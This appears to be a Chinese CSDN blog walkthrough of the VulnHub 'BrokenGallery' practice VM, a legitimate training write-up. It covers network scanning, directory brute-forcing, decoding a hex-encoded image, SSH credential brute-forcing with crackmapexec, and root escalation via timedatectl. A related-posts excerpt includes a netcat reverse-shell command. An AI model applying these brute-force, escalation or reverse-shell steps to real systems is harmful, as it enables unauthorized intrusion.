【VulnHub系列】BrokenGallery

最新推荐文章于 2023-06-27 21:08:31 发布
最新推荐文章于 2023-06-27 21:08:31 发布
阅读量532 收藏 1
点赞数
分类专栏: VULNHUB靶场题解集合 文章标签: Vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/131372852
版权

因为是从PDF转换过来偶尔可能会出现内容缺少,可以看原版PDF:有道云笔记

实验信息

Broken:192.168.10.111

Kali:192.168.10.106

实验过程

sudo arp-scan --interface eth0 192.168.10.1/24

然后对靶机进行端口探测 

nmap -sT -p- --min-rate 1000 192.168.10.111 -oA ./Broken_result

 

再对端口进行详细扫描和漏洞扫描

cat Broken_result.nmap | grep "open" | awk -F '/' '{print $1}' | paste -sd ',' 
sudo nmap -sT -sC -sV -p 22,80 192.168.10.111 -oA ./detail

详细扫描发现80端口有几个文件

 后台挂着gobuster来跑目录

sudo gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -u http://192.168.10.111/ -x txt,rar,zip,tar,sql,php

打开80端口,发现文件都wget保存到本地,查看网页源码以及文件来收集信息

xdg-open img_forest.jpg

查看REAMD.md的文件类型,是txt类型

用cat发现都是十六进制的字节码

-r选项用于将十六进制格式转换回二进制格式
-p表示输出纯粹的十六进制编码,而不包括其他信息
-s选项用于跳过文件的前N个字节

 

 通过strings来读二进制文件,通过head来读取前几行内容来确定文件类型

-r选项用于将十六进制格式转换回二进制格式
-p表示输出纯粹的十六进制编码,而不包括其他信息
-s选项用于跳过文件的前N个字节
xxd -r -ps README.md > README.bin

strings README.bin | head -n 10

可以看到JFIF头,说明这个文件是图片文件,更改为Jpg后缀并打开

 是一段文字信息

再用exiftool来看看其他图片,没有发现有隐藏的信息

同时目录爆破也并没有什么有用信息

所以只能把注意力放到22端口上 

我们根据从图片获取的信息制作一个简易的字典文件尝试爆破SSH

 通过crackmapexec进行SSH爆破

#--continue-on-success:表示成功获得凭据后继续爆破
#跟john相比,john更偏向快速,creackmapexec支持的协议和功能比较多

sudo crackmapexec ssh 192.168.10.111 -u creds -p creds --continue-on-success

获得账号密码

broken:broken

 

登陆broken,发现其可以通过timedatectl来提权 

 通过gtfobins:https://gtfobins.github.io/ 来查看对应的提权方法

 

 

成功获得root权限

 

 

大方子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
初识靶机_Broken——渗透day05
qq_62716256的博客
08-12 919
初识靶机_Broken——渗透day05
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub Broken
YangYubo091699的博客
08-04 319
Vulnhub靶场之Broken
vulnhub | BROKEN-2020: 1
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
09-07 444
文章目录总结前言开始 总结 - 0. arp 扫描 | netdiscover -i eth0 | arp-scan --interface=eth0 --localnet - 0.1 查看定时任务 | cat /etc/crontab - 1. python 开启一个http服务器 | python3 -m http.server 8080 - 2. nc 开启监听 | nc -lvp 4444 - 3. nc 反弹shell | nc -e /bin/bash 10.0.2.4 4444 -
Broken Gallery 靶场
zhoufy的博客
06-27 278
靶场
VulnHub靶场】——EMPIRE: BREAKOUT
Demo不是emo的博客
09-24 3413
​ 今天写一份EMPIRE: BREAKOUT靶场教程,靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场入口在这,推荐大家使用,大家进去直接搜索EMPIRE: BREAKOUT就能下载今天的靶场了,也可以找我拿,话不多说进入正题
VulnHub系列】DC4
大方子
04-09 675
https://note.youdao.com/s/FdSgf6NE
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
vulnhub-Nagini.txt
06-10
Nagini
Vulnhub篇potato.zip
01-12
Vulnhub篇potato靶机,靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
教你怎么用Vulnhub来搭建环境
热门推荐
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
Vulnhub系列】DC1
大方子
03-07 6131
文章目录基本信息实验过程额外内容使用CVE2014-3704添加管理账号另一种查询具有root权限命令的find语句 下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 基本信息 Kali:192.168.56.116 DC1:192.168.56.115 实验过程 现在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface=eth1 192.168.56.0/24 逐个排查发现DC1的IP地址为192.168.56.11
Vulnhub】DC9
大方子
01-16 5390
靶机下载地址:http://www.five86.com/downloads/DC-9.zip 主机信息 Kali:192.168.56.113 DC9:192.168.56.112 实验过程 先进行主机探测,查找靶机的IP地址: arp-scan --interface eth1 192.168.56.1/24 用nmap对主机进行排查确定,DC9的IP地址为192.168.56.112 可以看到DC开放了80端口以及22端口(被过滤) nmap -sC -sV -oA dc-9 192.168.56
Vulnhub系列】DC2
大方子
04-08 5138
文章目录基本信息实验过程额外内容rbash另一种绕过方式另一种查看当前用户可用命令方式 靶机下载地址:https://www.five86.com/downloads/DC-2.zip 基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.168.61.1/24 排查筛选得知,192.168.61.162为DC2的IP地址 接下来用Nmap对DC2进行端口扫描 n
Vulnhub系列】DC3
大方子
04-08 5088
文章目录基本信息实验过程额外补充利用php反弹shell使用Linux-Exploit-suggestion来辅助提权 靶机下载地址:https://download.vulnhub.com/dc/DC-3-2.zip 基本信息 Kali:192.168.61.145 DC3:192.168.61.163 实验过程 同样先通过arpscan扫描找出DC3的IP地址 sudo arp-scan --interface eth0 192.168.61.1/24 这里可以直接看出DC3的IP地址为192.1
Vulnhub靶机Wakanda渗透测试攻略
大方子
11-18 4627
百度网盘下载地址: 链接:https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw 密码:aixl 难度级别:中级。 用virtualbox导入Wakanda_1.ova靶机环境,修改其网络连接方式为Bridged(桥接网卡),并选择一个可用于联网的网卡(例如,我使用的无线网卡上网,在图中网卡为Inter(R) Dual Band Wireless-...
VulnHub】Raven: 2靶机的渗透测试
大方子
06-28 4086
总结和思考: 使用netdiscover探测内网存活主机 PHPMailer的漏洞反弹得到shell Python版的EXP修改 查看wordpress的wp-config.php配置文件得到数据库账号密码 MySQL版本 <= 7.14 5.6.32 5.5.51 可以利用UDF提权 KALI对EXP的编译 给程序chmod u+s 增加suid权限,可以以root权限运...
vulnhub靶机系列
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值